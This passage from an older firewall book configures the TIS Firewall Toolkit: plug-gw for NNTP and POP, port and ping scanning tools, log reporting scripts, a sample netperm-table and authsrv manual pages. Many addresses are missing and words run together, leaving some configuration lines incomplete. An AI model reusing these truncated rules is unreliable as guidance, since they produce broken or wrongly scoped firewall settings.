As with the other services, the host pattern that is specified with the port command allows forboth the allowed and non-allowed network or host IP addresses to be specified.

plug-gw and NNTPThe NNTP news protocol is used for reading Internet newsgroups. This protocol also per-forms news feeds and is often used to provide news reading services at the workstation level.The configuration of the plug-gw proxy for an Internet news feed is essentially the same as theconfiguration for a news reader.

In both cases, the NNTP port is defined in the etc/services file as 119. You must configure theplug-gw line as follows:

plug-gw: port 119 206.116.65.* -plug-to

Rule Description

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This means that any connections received on port 119 from the local LAN will be directed tothe same port on the system at two major reasons for handling NNTP withplug-gw are to allow NNTP client access through the firewall, and to allow for a newsfeed.

For the firewall to accept news connections, inetd must be configured to start the plug-gwapplication whenever a connection request is made for the NNTP port. This is done by addingthe following line to the /etc/inetd.conf file and restarting inetd:

nntp stream tcp nowait root /usr/local/etc/plug-gw plug-gw 119

If you configure plug-gw but forget this step, the TIS firewall Toolkit will seem not tooperate—no log messages will print to the files or to the console.

To configure an NNTP client, such as WinVN for the PC-based architecture, you must set upWinVN so that it knows where to connect. Normally, this would be the actual NNTP serverthat you want to access, but in this case, it is the name or IP address of the firewall. On thefirewall, the appropriate line in the netperm-table file must be included to specify where theNNTP client requests are to go. If several NNTP servers are available for reading news, youmay want to separate them onto different network ports on the firewall, so that traffic can besent to the different sites. Consider this sample part of the netperm-table file:

plug-gw: port 2119 206.116.65.* -plug-to -port 119plug-gw: port 2120 206.116.65.* -plug-to -port 119

In this scenario, when users want to read news from the server, they must connectto the firewall on port 2120. Figure 7.3 illustrates the configuration of the WinVN client foraccess to news through the firewall.

Figure 7.3Configuring WinVN to

use the NNTP proxy.

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Regardless of the news reader client software that you use, it needs to be configured to use thefirewall as the connection point or news host.

What if different news servers are available that your hosts are permitted to connect to? Howdoes the system administrator configure multiple hosts at the same TCP/IP service port? Theanswer is to specify a different port on the firewall, and let plug-gw redirect to the correct porton the remote system. This is done by using a rule in the nbetperm-table file:

plug-gw: port 2120 206.116.65.* -plug-to -port 119

According to this command, if a connection on port 2120 is requested, redirect that request onport 119 or the host at This is only part of the solution. The /etc/services fileshould also be edited to add a news NNTP service entry to show the new service port for thisconnection. For example, the following line specifies that the service nntp-a is on port 2120:

nntp-a 2120/tcp readnews untp # USENET News Transfer Protocol

The next step is to tell inetd that connections on this port are to be sent to the plug-gwapplication. This is done by adding the following line to the /etc/inetd.conf file and restartinginetd.

nntp-a stream tcp nowait root /usr/local/etc/plug-gw plug-gw 2120

When the user wants to use this alternate server, he or she must reconfigure the news clientsoftware, as shown in figure 7.4, to point to the new services port.

Although you can set up your firewall so that NNTP clients can read news, this is generally nota popular setup. A much more realistic configuration would be for the clients to interact with alocal news server. This configuration requires the firewall to allow for a news feed to be passedthrough to the internal news server.

Figure 7.4Configuring WinVN andNNTP.

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To do this, the external news server and the internal news client must be set up so that theypass their information through the firewall. The trick is understanding what configurationinformation must be placed in the news server configuration files on both ends. For thepurpose of this discussion, assume that the news server software in use is INN 1.4. The filehosts.nntp provides information regarding what hosts are permitted to connect to the INNNNTP server. Consider the news server and firewall configuration shown in figure 7.5.

Private Network Public Network


News ServerExternal

News Server

$cat hosts.nntp

$cat hosts.nntp

Figure 7.5News client and server.

Normally, the hosts.nntp file on each news server contains the name or IP address of the othernews server that is allowed to connect to it. In this case, the name of the machine that goes inboth hosts.nntp files is in fact the name or IP address of the firewall. This is because thefirewall actually establishes a connection from one network to the other, and from one serverto the other using the correct service port. With the hosts.nntp file correctly configured, therewill be no problems passing news through the firewall.

plug-gw and POPWhen you first think about using plug-gw with the TIS plug-gw application, the obviousquestion that comes to mind is “How do I configure things for authentication?” The trick is toremember which machine is actually performing the authentication. The firewall using plug-gw does no authentication. It merely accepts the incoming connection on the named port, andestablishes a connection from itself to the named system on the same or different port.

To see this in operation, you can establish a telnet connection to the POP port. Consider thesample output shown here:

$ telnet 110+OK UCB Pop server (version 2.1.2-R3) at starting.

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USER chrish+OK Password required for chrish.PASS agdfer+OK chrish has 0 message(s) (0 octets).QUITConnection closed by foreign host.$

Notice that the connection to the firewall was established at The remote system[] does not normally list its IP address in the output; a modified version of thePOP server was used to show the IP instead of the name.

Unfortunately, simply adding the entries to the netpwrm-table file is not enough. Like NNTP,inetd must be configured to accept connections on the POP service port, 110. This is done byadding the following line to the /etc/inetd.conf file and restarting inetd:

pop stream tcp nowait root /usr/local/etc/plug-gw plug-gw 110

With the firewall now accepting POP service requests, plug-gw must be configured to redirectthose POP requests to the appropriate server. This is done by adding this next line to thenetperm-table file:

plug-gw: port 110 206.116.65.* -plug-to

After it is added, POP service requests received by the firewall are redirected to the specifiedserver.

The preceding example shows the process of establishing a POP session using telnet, but howdo you configure a workstation that relies on POP to pass traffic through the firewall? Figure7.6 shows a configuration screen from the Eudora 1.52 shareware e-mail package:

Figure 7.6Setup for a POP e-mailpackage.

In this example, the user@hostname specification for the POP server identifies the real username, but specifies the IP address for the firewall. The IP or name of the firewall can be usedinterchangeably in this field. The only reason for using the IP address rather than the name isif you have a DNS reliability problem, or to ensure that you connect to the correct host.

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Consequently, when the incoming connection is received on port 110, plug-gw starts a sessionto the remote host specified in the plug-gw rule. This results in the mail being transferred fromthe remote end through the firewall to the workstation.

Incidentally, the POP mail client in use is irrelevant. The plug-gw configuration has beentested with Eudora, Microsoft Exchange, and Pegasus Mail; every package tested functionsproperly.

The Companion Administrative ToolsA set of support tools are included with the TIS Toolkit to assist in the setup and ongoingadministration of the firewall. These include a port scanner, a network subnet ping manager,and log analysis and reporting tools.

Note Depending upon the version and completeness of the Toolkit you downloaded,some services and programs may not be installed or compiled automatically. It isstrongly suggested that you retrieve the lastest version and patches directly from thethe TIS FTP site.

portscanThe portscan program attempts to connect to every TCP port on a given machine. The defaultoperation is to connect to each port in sequence on the named host/. The portscan program’sscan of the machine, for example, was answered by the following ports:

pc# ./portscan pc.unilabs.orgftptelnetgopherhttpdpopnntpwho2021202321207777pc#

You can see from the output of portscan that very few ports are in fact in operation on themachine that was contacted.

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netscanThis is a network ping program. It accepts as an argument a network address and starts to pingeach address on the network. Its default output is a list of each of the addresses that respondedto the ping, along with the host’s name. The use of netscan in default mode is shown in thisexample:

pc# ./netscan ( ( (^Cpc#

This output shows that the first host that responded to a ping was Notice thateven though the program pings each address in turn, there is not always a response. Thisindicates that either no device exists, or netscan attempted to contact a device that does notrespond to pings.

A verbose mode is also available with netscan. In verbose mode, addresses that respond to aping are placed with their name or address flush left; addresses that did not respond areindented one tab space. This mode is enabled by using the -v option on the command line:

pc# ./netscan -v 198.53.32trying subnet 198.53.32 ( (^Cpc#

This tool helps determine what hosts are on a network, which may affect how you specify theconfiguration rules for your network.

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Reporting ToolsThe TIS Toolkit, configured as a firewall, logs transactions and requests processed by Toolkitapplications, and records the outcome of these requests. The log file messages are recordedthrough the syslog daemon. The files used to save the details are listed in /etc/syslog.conf, andvary from system to system. The TIS Toolkit applications all interact with the syslog serviceand send logging information and status messages for the lifetime of the connection.

You can periodically peruse the log files, or use the reporting programs included with theToolkit to search out and report usage of the firewall. Because the logging is performed usingthe syslogd service, the log messages observe the standard format:

Date Time hostname program[PID]: message

This format appears in the log file looking like this:

Oct 4 02:42:14 pc ftp-gw[1763]: permit➥use of gateway

A wide variety of log messages can be displayed in the syslog file. Some of these are illustratedin the following output:

cannot connect to server No route to hostcannot connect to server Operation timed outcannot connect to server Connection refusedcannot connect to server Operation timed outcannot get our portconnect destination= host=unknown/ destination= to nds.fonorola.netcontent-type= multipart/x-mixed-replace;boundary=ThisRandomStringcontent-type= text/htmldeny host= connect to fox.nstn.cadeny service=ftpddeny destination=sco.sco.comdeny host=unknown/ service=110disconnect destination=➥in=3512 out=92 duration=8disconnect host=unknown/ destination= in=0 out=0➥duration=75exit dest= in=0 out=0exit dest= in=0 out=0 user=unauth duration=2exit in=35 out=21➥user=unauth duration=37

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exit dest=none in=0 out=0 user=unauth➥duration=14exit cmds=1 in=0 out=0 user=unauth➥duration=2exit no authfailed to append to file (null)failed to connect to http server iback.gif (80)fwtksyserr: cannot display denial-msg /usr/local/etc/tn-deny.txt: No such file or➥directoryfwtksyserr: cannot display help file /usr/local/etc/tn-help.txt: No such file or➥directoryfwtksyserr: cannot display help message /usr/local/etc/rlogin-help.txt: No such➥file or directoryfwtksyserr: cannot display welcome /usr/local/etc/rlogin-welcome.txt: No such file➥or directoryfwtksyserr: cannot display welcome /usr/local/etc/tn-welcome.txt: No such file or➥directorylog protocol=HTTP path=/log protocol=HTTP cmd=dir dest=iback.gif➥path=/log protocol=HTTP cmd=get➥path=/cgi-bin/test/tide.cgiNetwork connection closed during writepermit connect to connect to [emailprotected] use of gatewaypermit connect to mail.fonorola.netpermit destination= service=ftpd execute=/usr/libexec/➥ftpdpermit service=ftpd execute=/bin/catpermit service=telnetd execute=/usr/libexec/telnetdpermit use of gatewaypermit use of gateway (Ver p1.4 / 1)

These log messages do not represent a complete list. The only way to see a complete list ofpossible log messages and their exact meanings is to perform a line-by-line review of the TISToolkit code, and then document each item individually.

The Toolkit includes a number of reporting tools that can be used to analyze the log recordssaved by the syslog service. These shell scripts, listed in table 7.18, are in the fwtk/tool/admin/reporting directory.

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Table 7.18syslog Report Generating Scripts

Script Name Description Summarizes auth server reports Runs the report scripts on a daily basis Reports on denial of services Summarizes ftp-gw traffic Summarizes the http-gw traffic Summarizes netacl accesses Summarizes smap email records Summarizes tn-gw and rlogin-gw traffic Top-level driver that calls each summary report generator

The reporting tools included in the TIS Toolkit are not installed automatically when theToolkit applications are compiled and installed. They must be installed later by changing tothe directory tools.admin.reporting and running the make install command. This copies all thefiles to the same directory in which the Toolkit applications were copied.

The Authentication Server ReportThe authentication server report identifies various authentication operations that are carried outon the server. A typical report of looks like this:

pc# ./ < /var/log/messages.0

Top 100 permitted user authentications (total: 6)Logins User ID------ -------4 admin2 chrish

Top 100 failed user authentications (total: 2)Attempts Username-------- --------1 paulp1 chrish

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Authentication Management Operations-----------------------------------administrator ADDED adminadministrator ADDED adminadministrator ADDED chrishadministrator ADDED chrishadministrator ADDED paulpadministrator DELETED adminadministrator DELETED chrishadministrator ENABLED adminadministrator ENABLED chrishadministrator GROUP admin manageradministrator GROUP chrish productionadministrator GROUP paulp copyadministrator GWIZ chrishadministrator GWIZ chrishadministrator GWIZ paulpadministrator PASSWORD adminadministrator PASSWORD chrishadministrator PROTOCOL adminadministrator PROTOCOL chrishadministrator UN-GWIZ chrishadministrator WIZ adminadministrator WIZ chrish

Notice that this and all the other reporting tools expect to read their data from the standardinput stream. These reporting tools can do this by using the cat command with a pipe, or byredirecting the input stream from the log file.

The authsrv summary report lists the total authentication requests made and by whom, thedenied authentication, and the authentication database management operations. If you runthis report after a heavy period of user administration, it will be quite verbose.

The Service Denial ReportThe purpose of the service denial report is to identify hosts that attempted to connect throughthe firewall and were not permitted. The report reads through the specified log file andreports on:

■ The top 100 network service users

■ The top 100 denied service users

■ The total service requests by service

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A sample execution of looks like this:

pc# ./ < /var/log/messages.0

Authentication FailuresFailures Proxy: Host - ID-------- ----------------1 s: disable - paulp1 ftp-gw: - chrish

Top 100 network service users (total: 152)Connects Host/Address-------- ------------120 unknown/

Top 100 Denied network service users (total: 12)Connects Host/Address-------- ------------2 unknown/

Service RequestsRequests Service-------- -------12515 ftp10 telnet5 telnetd4 ftpd3 1101 21201 119

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The report can be used to highlight sites that have attempted unauthorized connections to thefirewall; the report also highlights sites that are authorized to connect, but whose users do notknow how, or have forgotten their passwords. All of these examples may be legitimate prob-lems, or potential security breaches.

The FTP Usage ReportThe FTP usage report identifies sites that are connected to FTP services through the firewall. Itidentifies the number of connections, the origin of the connection, and the amount of datatransferred. A sample execution of looks like this:

pc# cat /var/log/messages* | ./ftp-summ.shFTP service users (total: 23)Connects Host/Address-------- ------------13

Denied FTP service users (total: 4)Connects Host/Address-------- ------------2

FTP service output thruput (total Kbytes: 6)KBytes Host/Address------ ------------6

FTP service input thruput (total Kbytes: 4)KBytes Host/Address------ ------------3

As you can see in this report, several service denials occurred on this firewall. A couple camefrom an external site, but also an internal host attempted to access the site. Many sites chooseto not allow FTP at all because of the potential problems associated with pirated software orvirus infected software.

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The HTTP Usage ReportThe HTTP usage report identifies traffic that has been passed through the http-gw application.The report covers connection requests, denied service requests, and input and output throughthe proxy. A sample HTTP usage report looks like this:

pc# cat /var/log/messages* | ./http-summ.shHTTP service users (total: 130)Connects Host/Address-------- ------------127 unknown/ HTTP service users (total: 1)Connects Host/Address-------- ------------1

HTTP service output thruput (total Kbytes: 1)KBytes Host/Address------ ------------1

HTTP service input thruput (total Kbytes: 315)KBytes Host/Address------ ------------315

A few requests out through the firewall may result in a much higher rate of information inputto the firewall. You can see this in list 4; 1 KB of data out through the firewall resulted in 315KB from the remote end.

The netacl reportRecall that netacl is a method of allowing access to the services on the firewall itself, such astelnet. This program enables administrators and other users to operate directly on the firewallwithout the need to be on the console.

The netacl report identifies the connects that have been made to the firewall and on whatservices, as well as the origin of the requests. A sample execution of the netacl-summ.shcommand is shown here:

pc# cat /var/log/messages* | ./netacl-summ.shTop 100 network service users (total: 40)Connects Host/Address-------- ------------19 unknown/

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2 unknown/

Top 100 Denied network service users (total: 11)Connects Host/Address-------- ------------6

Service RequestsRequests Service-------- -------32 ftpd18 telnetd

In a previous section in this chapter, only telnet and ftp service were configured to be availablewith netacl. This setup was chosen so that you, the network administrator, could update filesand interact with the firewall from places other than the console. The denied requests resultfrom other hosts attempting to connect to your netacl ports (telnet was 2023, and ftp was2021).

This report identifies sites that are attempting to log in or ftp directly to the firewall itself,rather than log in to a site behind the firewall.

The Mail Usage ReportAnother important piece of information for the administrator is knowing how much mail isflowing through the firewall. Many sites do not allow any traffic other than mail through thefirewall; for this reason, knowledge of the amount of information available helps determine ifthe chosen hardware platform is in fact doing the job. The mail usage report generator identifiesfor the administrator the number of messages received per user, and how many bytes in mailtraffic were handled by the firewall.

The following sample execution of the mail report,, illustrates this script’simportance:

pc# cat /var/log/messages* | ./smap-summ.shTotal messages: 10 (22 Kb)

Top 100 mail recipients (in messages)Messages Count Kb Address ----- -- ------- 2 7.6 [emailprotected] 2 7.6 chrish 2 2.9 [emailprotected]

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1 1.5 [emailprotected] 1 1.1 [emailprotected] 1 0.9 [emailprotected] 1 0.9 [emailprotected]

Top 100 mail senders (in messages)Messages Count Kb Address ----- -- ------- 9 21.4 [emailprotected] 1 1.1 [emailprotected]

Top 100 mail recipients (in kilobytes)Messages Count Kb Address ----- -- ------- 2 7.6 [emailprotected] 2 7.6 chrish 2 2.9 [emailprotected] 1 1.5 [emailprotected] 1 1.1 [emailprotected] 1 0.9 [emailprotected] 1 0.9 [emailprotected]

Top 100 mail senders (in kilobytes)Messages Count Kb Address ----- -- ------- 9 21.4 [emailprotected] 1 1.1 [emailprotected]

The telnet and rlogin Usage ReportThe telnet and rlogin usage report ( combines activity through the firewall ofthe telnet and rlogin services. This report identifies the following:

■ The number of connections

■ The connecting host

■ Characters input to the firewall for transmission to the public network

■ Characters received by the firewall for the private network

■ Denied connections

The following report provides a sample execution of

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Top 100 telnet gateway clients (total: 43)Connects Host/Address Input Output Total-------- ------------ ----- ------ ----- 17 stargazer.unilabs.or 924 177 1101 16 97325 1243 98568 3 stargazer.unilabs.or 274 6 280 3 26771 717 27488 2 unknown/ 27271 710 27981 1 unknown/ 10493 701 11194 1 0 0 0

Top 100 telnet gateway clients in terms of trafficConnects Host/Address Input Output Total-------- ------------ ----- ------ ----- 16 97325 1243 98568 3 26771 717 27488 2 unknown/ 27271 710 27981 1 unknown/ 10493 701 11194 17 stargazer.unilabs.or 924 177 1101 3 stargazer.unilabs.or 274 6 280 1 0 0 0

Top 100 Denied telnet gateway clients (total: 20)Connects Host/Address-------- ------------ 14 stargazer.unilabs.or 2 stargazer.unilabs.or 2 1 unknown/ 1

This report provides details on who is connecting through the firewall, how much traffic isbeing generated, and who is being denied. You can see, for example, that stargazer.unilabs.orgis in both the connections and denied lists. This may indicate that at one point the site wasdenied, and then later authorized to use the telnet or rlogin gateways.

Where to Go for HelpHelp with the TIS Toolkit is easy to find. Discussions on general Internet security-relatedtopics can be found in the Usenet newsgroups:


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You can also find help by joining the mailing list concerned with a general discussion offirewalls and security technology:


To subscribe to the mailing list, send a message to:


with the text

subscribe firewalls

in the body of the message.

To reach users familiar with the TIS Toolkit applications and their configuration, contact thismailing list:


In addition, the TIS Toolkit includes a large amount of documentation on firewalls. If youplan to make significant use of the Toolkit you should join the TIS discussion lists first. Beforeyou commit to an operating system and hardware platform, ask questions on this mailing list;probably many of the list’s readers have had similar questions and experiences.

Sample netperm-table FileThis section lists a sample netperm-table file. To help you understand this file better, aprodigious amount of comments are included. In addition, a wide variety of options areincluded so that you can see how the examples used in the chapter would appear whenconfiguring the TIS Toolkit.

## Sample netperm configuration table## Change YOURNET to be your network IP address# Change YOURADDRESS to be the IP address of a specific host## Example netacl rules:# ---------------------# if the next 2 lines are uncommented, people can get a login prompt# on the firewall machine through the telnet proxy

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# This is okay, but means that anyone who is authorized to connect to the# firewall box through the proxy can get a login prompt on the firewall.# In most circ*mstances, it is to provide tight controls on who can log in# directly to the firewall.#netacl-telnetd: permit-hosts -exec /usr/libexec/telnetd#netacl-telnetd: permit-hosts YOURADDRESS -exec /usr/libexec/telnetd## This rule says that only telnet sessions through netacl from these two hosts# will be accepted.netacl-telnetd: permit-hosts -exec /usr/libexec/telnetd## if the next line is uncommented, the telnet proxy is available#netacl-telnetd: permit-hosts * -exec /usr/local/etc/tn-gw## if the next 2 lines are uncommented, people can get a login prompt# on the firewall machine through the rlogin proxy#netacl-rlogind: permit-hosts -exec /usr/libexec/rlogind -a#netacl-rlogind: permit-hosts YOURADDRESS -exec /usr/libexec/rlogind -a## if the next line is uncommented, the rlogin proxy is available to any host#netacl-rlogind: permit-hosts * -exec /usr/local/etc/rlogin-gw## The next line allows FTP sessions from the specified network(s) to the# firewall system itself.netacl-ftpd: permit-hosts 206.116.65.* -exec /usr/libexec/ftpd -A -l## Uncommenting the next line will turn off FTP and print a message to that# effect whenever someone attempts to access the FTP port.# netacl-ftpd: permit-hosts -exec /bin/cat /usr/local/etc/noftp.txt## to enable finger service uncomment these 2 lines#netacl-fingerd: permit-hosts YOURNET.* -exec /usr/libexec/fingerd#netacl-fingerd: permit-hosts * -exec /bin/cat /usr/local/etc/finger.txt## Example smap rules:# -------------------# These rules control the operation of the SMAP and SMAPD applications.smap: userid 6smap: directory /var/spool/smapsmap: timeout 3600## Change this to increase/decrease the maximum message size that will be# permitted.smap: maxbytes 10000smap: maxrecip 20

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## This configuration section is for the SMAPD application#smapd: executable /usr/local/etc/smapdsmapd: sendmail /usr/sbin/sendmailsmapd: userid 6smapd: directory /var/spool/smapsmapd: baddir /var/spool/smap/badsmapd: wakeup 900## Example ftp gateway rules:# --------------------------# These rules control the operation of the FTP proxy## Use the following lines to configure the denial, welcome and help messages# for the proxy.ftp-gw: denial-msg /usr/local/etc/ftp-deny.txtftp-gw: welcome-msg /usr/local/etc/ftp-welcome.txtftp-gw: help-msg /usr/local/etc/ftp-help.txt## Use the following lines to use the authentication serverftp-gw: authserver localhost 7777## set the timeoutftp-gw: timeout 3600# uncomment the following line if you want internal users to be# able to do FTP with the internet# ftp-gw: permit-hosts 206.116.65.*## the following line logs all get and put requests, and authorizes put# requests.ftp-gw: permit-hosts 206.116.65.* -log { retr stor } -auth { stor }# uncomment the following line if you want external users to be# able to do FTP with the internal network using authentication#ftp-gw: permit-hosts * -authall -log { retr stor }## Example telnet gateway rules:# -----------------------------tn-gw: denial-msg /usr/local/etc/tn-deny.txttn-gw: welcome-msg /usr/local/etc/tn-welcome.txttn-gw: help-msg /usr/local/etc/tn-help.txttn-gw: timeout 3600tn-gw: prompt “Enter Command>”## the following line permits a telnet only to hosts in the domain. All other requests are denied.#tn-gw: permit-hosts 206.116.65.* -dest * -dest !* -passok -➥xok

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tn-gw: permit-hosts 206.116.65.* -passok -xok# tn-gw: deny-hosts * -dest if this line is uncommented incoming traffic is permitted WITH# authentication required# tn-gw: permit-hosts * -auth

# Example rlogin gateway rules:# -----------------------------#rlogin-gw: permit-hosts YOURNET.* -passok -xokrlogin-gw: denial-msg /usr/local/etc/rlogin-deny.txtrlogin-gw: welcome-msg /usr/local/etc/rlogin-welcome.txtrlogin-gw: denydest-msg /usr/local/etc/rlogin-dest.txt#rlogin-gw: help-msg /usr/local/etc/rlogin-help.txtrlogin-gw: timeout 3600rlogin-gw: prompt “Enter Command>”rlogin-gw: permit-hosts 206.116.65.* -dest * -dest !* -passok -xokrlogin-gw: deny-hosts * -dest if this line is uncommented incoming traffic is permitted WITH# authentication required#rlogin-gw: permit-hosts * -auth -xok

# Example auth server and client rules# ------------------------------------authsrv: hosts database /usr/local/etc/fw-authdbauthsrv: badsleep 1200authsrv: nobogus trueauthsrv: permit-hosts localhost# clients using the auth server*: authserver 7777

# X-forwarder rulestn-gw, rlogin-gw: xforwarder /usr/local/etc/x-gw## Plug-gw# ----------# The following rules provide examples on using plug-gw to access other# services, such as POP mail and NNTP.## Uncomment the next line to allow NNTP connections to be routed to an# external news server for news reading.## plug-gw: port 119 YOURNET.* -plug-to NEWS_SERVER_IP## Uncomment the next line to allow POP mail connections from the private# network to an external POP mail host.#

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# plug-gw: port 110 YOURNET.* -plug-to POP_MAIL_HOST_IP## HTTP-GW# --------# This section provides some examples for the http-gw proxy#http-gw: userid www# http-gw: directory /usr/local/secure/wwwhttp-gw: timeout 1800http-gw: default-httpd www.fonorola.nethttp-gw: default-gopher gopher.fonorola.nethttp-gw: permit-hosts 206.116.65.*# http-gw: deny-hosts deny-hosts unknown

Manual Reference PagesThe following manual pages are taken from the TIS Toolkit and modified to fit within theformatting of this book. Many sections that have been empty were omitted, and should not beconstrued to replace the actual manual pages included with the Toolkit. The sections notgenerally included are BUGS, SEE ALSO, and FILES.

These manual pages have been formatted to make reading and referencing them easier. Eachmanual page includes the following sections:

■ Synopsis

■ Description

■ Options

■ Installation

Command-specific sections are also included. While setting up and configuring your firewall,this section will prove to be an invaluable aid.

Authmgr—Network Authentication Client Program


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Descriptionauthmgr is a client-side interface to the authentication daemon authsrv. authmgr is useful if anadministrator wants to access the authentication server over a network, or wants to encrypt theconnection. The authmgr program passes most of its commands directly over a network toauthsrv. All commands supported by authsrv are supported by authmgr with the same syntax;authmgr also accepts the login [username] command, which automates authentication toauthsrv.

Optionsauthmgr takes no command-line options, reading its configuration information from thefirewall Toolkit configuration file netperm-table. All configuration rules in netperm-table forapplication “authmgr” are read, and the following clauses and parameters are recognized:

authserver hostname [port] [key]

This command specifies the hostname or network address where the authentication server isrunning. If the optional port is specified, it is used as a numeric service port value. If theoptional key is specified, all traffic with the server is DES-encrypted using the shared key. Keysmust match between client and server.

If compiled-in values for authserver and port are provided, they will be used as a default ifthere are none specified in netperm-table.

InstallationTo install authmgr, configure the authserver option in netperm-table to contain the address ofthe authentication server system. Check connectivity by attempting to log in.

authsrv—Network Authentication Third-PartyDaemon

Synopsisauthsrv via inetd

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Descriptionauthsrv functions as a simple third-party authentication server, and provides an integratedinterface for multiple forms of authentication, such as passwords, one-time passwords, andtoken authentication systems. authsrv maintains a database of user and group records with asimple administrative interface that permits an authenticated administrator to manage userrecords locally or over a network. authsrv maintains extensive logs of transactions, authentica-tion failures and successes, and all changes to its database. authsrv also can be configured toperform basic security operations such as disabling user accounts automatically when there aremore than a set number of failed login attempts.

Many commercial products for authentication include their own programming interface; forthis reason, the simultaneous support of multiple forms of authentication within a single pieceof software is cumbersome. authsrv multiplexes authentication schemes and uses a simpleprotocol with the client software, permitting administrators to add or drop authenticationschemes easily without the need to modify client code. Currently authsrv contains support forDigital Pathways Secure Net Key, Security Dynamics SecurID, Bellcore S/Key, and plaintextpasswords.

authsrv’s basic authentication protocol uses ASCII text, with newline indicating the end of aline. When a client connects to the authentication server, it issues a request to authenticate auser:

authorize userID

authenticate userID

To which the server will respond with one of two options:


challenge challengestring

The client program should prompt the user for a (non-echoing) password if it receives the“password” response, or it should prompt the user with the returned challenge string if itreceives the “challenge” response. The client program should forward the user’s password orchallenge response to which the server will either respond “OK” or respond with an arbitrarytext string that should be returned to the user. The client program forwards the response in theform of:

response responsestring

In some cases, the server may respond with “OK” followed by additional text on the same line.Additional text may contain information of interest to the user (such as, “OK. Change yourpassword soon”).

authsrv can also be invoked from the terminal directly for administrative purposes. If it isinvoked from a terminal with the current user-id being 0 (“root”) it will automatically grantadministrative privileges to the session. This is based on the pragmatic realization that if

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someone has system privileges on the host serving the authentication database, they alreadyeffectively have administrative privileges.

Generally, authsrv is designed to run on a secured system that is relatively restricted to users. Ina firewall environment, the firewall host itself is a good candidate for running authsrv becausetypically the bastion host is secured, and is where the client software that uses authsrv isrunning. To ease administration, authsrv can be managed remotely using a client programwith optional DES-encrypted communications between the client and server.

Groups and Usersauthsrv supports a group and user configuration. Each user may be assigned to a group,consisting of a short arbitrary string name. Two levels of permissions are used in authsrv:administrator and group administrator. A group administrator can create, enable, disable, anddelete users from that group, but may not create additional group administrators or groups.The overall system administrator can create new groups (by simply assigning someone to agroup that previously did not exist) and can hand out group administration privileges. Thissetup provides a flexible management environment—a variety of management schemes can beimplemented. To implement a monolithic management scheme, simply create several adminis-trators and have them manage the database. To implement a hierarchical management scheme,create several group administrators and let each manage a group separately. Another setup canbe used that eliminates the administrator user-id. All operations can be performed at a grouplevel, and new groups can be created by running authsrv in administrator mode on the systemwhere the database resides.

Optionsauthsrv takes no command-line options, reading its configuration information from thefirewall Toolkit configuration file netperm-table(5). All configuration rules in netperm-tablefor application “authsrv” are read, and the following clauses and parameters are recognized:

database pathname

This command specifies the pathname of the authsrv database. The database is stored as adbm(3) file with a third file used for locking. If the software is built with a compiled-indatabase name, this option need not be set, otherwise it is mandatory.

The following command indicates that authsrv should return “user-friendly” error messageswhen users attempt to authenticate and fail:

nobogus true

The default message is simply to respond, “Permission Denied,” or to return a bogus challenge.If nobogus is set, attempts to log in will return more explicit error messages. Site administra-tors concerned about attempts to probe the authentication server should leave this optiondisabled.

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The following command establishes a “sleep time” for repeated bad logins:

badsleep seconds

If a user attempts to authenticate five times and fails, their user record is marked as suspicious,and they cannot log in again. If the badsleep value is set, the user may attempt to log in againafter that many seconds has expired. If the badsleep value is 0, users may attempt (and fail) tolog in as many times as they would like. The default value is to effectively disable the accountuntil an administrator re-enables it manually.

To specify the userid that authsrv should run under, use a name from the password database,or a numeric userid in the command:

userid name

To specify that authsrv should permit the named host or addresses to use the service, add thiscommand:

hosts host-pattern [key]

Hosts that do not have a matching entry are denied use of the service. If the optional key isspecified, and the software is compiled with DES-encrypted communications, all traffic withthat client will be encrypted and decrypted with the specified key.

CommandsThe following command implements the first part of the authentication sequence:

authorize username

If the authorize command is issued after a user has already authenticated to the authenticationserver, their current authentication is cleared.

To implement the second part of the authentication sequence, the following command is used.This is returned in response to a password or challenge query from the authentication server:

response <text>

To disconnect from the authentication server, issue:

quit or exit

To display the status, authentication protocol, and last login of the specified user, issue thecommand:

display username

Before the authentication server permits the use of this command, the user must first beauthenticated to the server as the administrator, or the group administrator of the group towhich the user belongs.

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To add a user to the authentication database, enter the command:

adduser username [longname]

Before the authentication server permits the use of this command, the user must first beauthenticated to the server as the administrator or as a group administrator. If the user is agroup administrator, the newly created user is automatically initialized as a member of thatgroup. When a user is added, he or she is initially disabled. If a long name is provided, it willbe stored in the database. Long names should be quoted if they contain white space, as in thisexample:

adduser mjr “Marcus J. Ranum”

To delete the specified user from the authentication database, use the command:

deluser username

Before this command can be used, the user must first be authenticated to the server as theadministrator or group administrator of the group to which the user being deleted belongs.

The following commands enable and disable the specified user’s account for login:

enable username

disable username

Before this command can be used, the user must first be authenticated to the server as theadministrator or group administrator of the group to which the user being enabled or disabledbelongs.

To set the password for the current user, issue:

password [username] text

If an optional username is given and the authenticated user is the administrator or groupadministrator, the password for the specified user is changed. The password command ispolymorphic depending on the user’s specified authentication protocol. For example, if theuser’s authentication protocol is plaintext passwords, the command will update the plaintextpassword. If the authentication protocol is SecurID with PINs, it will update the PIN.

The following command sets the authentication protocol for the specified user to the namedprotocol:

proto user protoname

Available protocols depend on the compiled-in support within authsrv. To change a user’sauthentication protocol, the user must be authenticated to the server either as the administra-tor or group administrator of the user’s group. To set the specified user’s group, use thecommand:

group user groupname

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To use this command, a user must first be authenticated to the server as the administrator.Group administrators do not have the power to “adopt” members.

The following commands set and unset the group administrator flag on the specified user. Toissue this command, a user must be authenticated to the server as the administrator.

wiz user

unwiz user

This command sets the specified user as a global administrator:

superwiz user

The superwiz command should be used with caution. Usually the groupmechanism is powerful enough for most system maintenance. For this reason, globaladministrative privileges are seldom used.

To list all users that are known to the system, or the members of the specified group, use thecommand:

list [group]

Group administrators may list their own groups, but not the entire database. The list displaysseveral fields, including:

■ user. The login ID of the user.

■ group. The group membership of the user. If none is listed, the user is in no group.

■ longname. The user’s full name. This may be left blank.

■ status. Contains codes indicating the user’s status. If this field is marked “y” the user isenabled and may log in. If marked “n” the user’s login is disabled. If marked “b” theusers login is temporarily disabled because of too many bad login attempts. Users flaggedwith a “W” have the administrator bit set; users flagged with a “G” have the groupadministrator bit set.

■ proto. Indicates the form of authentication in use for the login.

■ last. Indicates the time of the last successful or unsuccessful login attempt.

To list a short synopsis of available commands, use this command:

? or help

To determine if the named user is allowed to perform the specified service, use the command:

operation user username service dest [other tokens] [time low# high#]


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The service might be any one of the application gateway such as telnet-gw, ftp-gw, or rlogin-gw. The destination is any valid IP domain. The optional tokens are matched as wildcards topermit a proxy to specify more detailed operations. If a matching rule is found, the appropriateresponse is returned to the client. If no match is found, a message indicating that no match wasfound is returned to the client program. Here is an example:

operation user mjr telnet-gw operation user mjr ftp-gw➥put

